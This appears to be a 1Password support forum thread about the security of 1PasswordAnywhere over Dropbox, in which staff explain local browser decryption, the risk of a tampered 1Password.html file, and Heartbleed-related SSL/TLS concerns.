Dropbox 1PasswordAnywhere secure?
New user, I hope you'll forgive what is probably a silly question: does use of 1PasswordAnywhere on my home and office computers (neither are "public") seriously lessen the security of my passwords? Or should I feel reasonably confident that interacting with that DropBox file is not leaving my data exposed? I have the iOS version of 1Password, and would like to be able to read/use my passwords on other machines.
Comments
-
Hi @nopenotme,
Good question! First of all, 1PasswordAnywhere uses the very same data file that 1Password itself uses, so it has the same security in that respect. When using 1PasswordAnywhere, your encrypted data is not stored on disk unencrypted at any point. For all intents and purposes it is exactly as secure as using the main 1Password application. Also, all encryption/decryption of your data is done locally in your browser using JavaScript.
If you have any more specific questions about this, please let us know! :)
0 -
As @JasperP has correctly pointed out, it is all the same data, encrypted all the same way, with all of the same security properties.
As you probably know, there are a rarely simple answers to security questions. So here is where it gets complicated:
However, there is one risk unique to 1PasswordAnywhere, which does not apply to other cases. If an attacker is capable of breaking into your Dropbox account and changes the contents of the 1Password.html file, she can modify it so that it records and sends off your Master Password.
When you use the 1Password application itself, there are numerous checks to ensure that the software you are running hasn't been tampered with. But those checks depend on things checked by your operating system. But when you are loading cryptographic tools into your browser from a website (in this case your page on Dropbox), you have to trust that those tools haven't been tampered with.
So, if you worry that someone might be able to tamper with your 1Password.html file on Dropbox, you should carry those worries over to 1PasswordAnywhere. If, on the other hand, you are sufficiently confident that nobody has compromised your Dropbox account and tampered with your data there, then you should continue to feel comfortable using 1PasswordAnywhere.
0 -
That helps a great deal. Thanks.
0 -
On behalf of @JasperP and @jpgoldberg, you are quite welcome!
Looking forward to replying to your other posts momentarily. :)
0 -
The possibility of someone tampering with the 1Password.html file is really good to know about. That changes the way I think about one of my practices. You guys think of everything. Thanks for the explanation, @jpgoldberg.
0 -
You are very welcome, @ethansisson!
I don't know about "think of everything", but we do pay attention to where attacks may come from and to the cryptographic and security literature.
0 -
Great thread. Do developments like Goto Fail and Heartbleed raise additional concerns?
0 -
Great thread. Do developments like Goto Fail and Heartbleed raise additional concerns?
Yes.
From the blog (http://blog.agilebits.com/2014/04/08/imagine-no-ssl-encryption-its-scary-if-you-try/)
The one place where 1Password depends on the security of SSL/TLS is for 1PasswordAnywhere. If an attacker can control that connection, they could substitute in a malicious copy of the 1password.html file. However, at latest check, Dropbox does not appear to be affected by the Heartbleed bug, so this particular issue with SSL/TLS security is not a worry for those using 1PasswordAnywhere. However, Dropbox is reported to have been vulnerable earlier, so until Dropbox has a new certificate in place, we advise people to avoid using 1PasswordAnywhere.
0 -
I guess the point here is that there are (or were) two ways to tamper with 1Password.html—on the dropbox.com servers or in transit.
0 -
Dropbox was early to update OpenSSL (it was patched before I tested Tuesday morning, and I'm only going on other reports that it had been vulnerable).
I don't know if they are attempting to get and install new certificates or whether they will be advising people to change passwords.
0 -
Here's what I have not seen in the reporting:
Do not log on to any sensitive website until you receive assurance either
- that the site never had the Heartbleed vulnerability – or –
- that the site has been patched and secured via a new certificate issued using a new keypair.
Why am I not seeing this warning? Is it because my understanding of the threat is wrong (Schneier says that “the probability is close to one that every target has had its private keys extracted by multiple intelligence agencies”), or is it because the advice is sound but the consequences of giving it are too horrific to comtemplate?
0
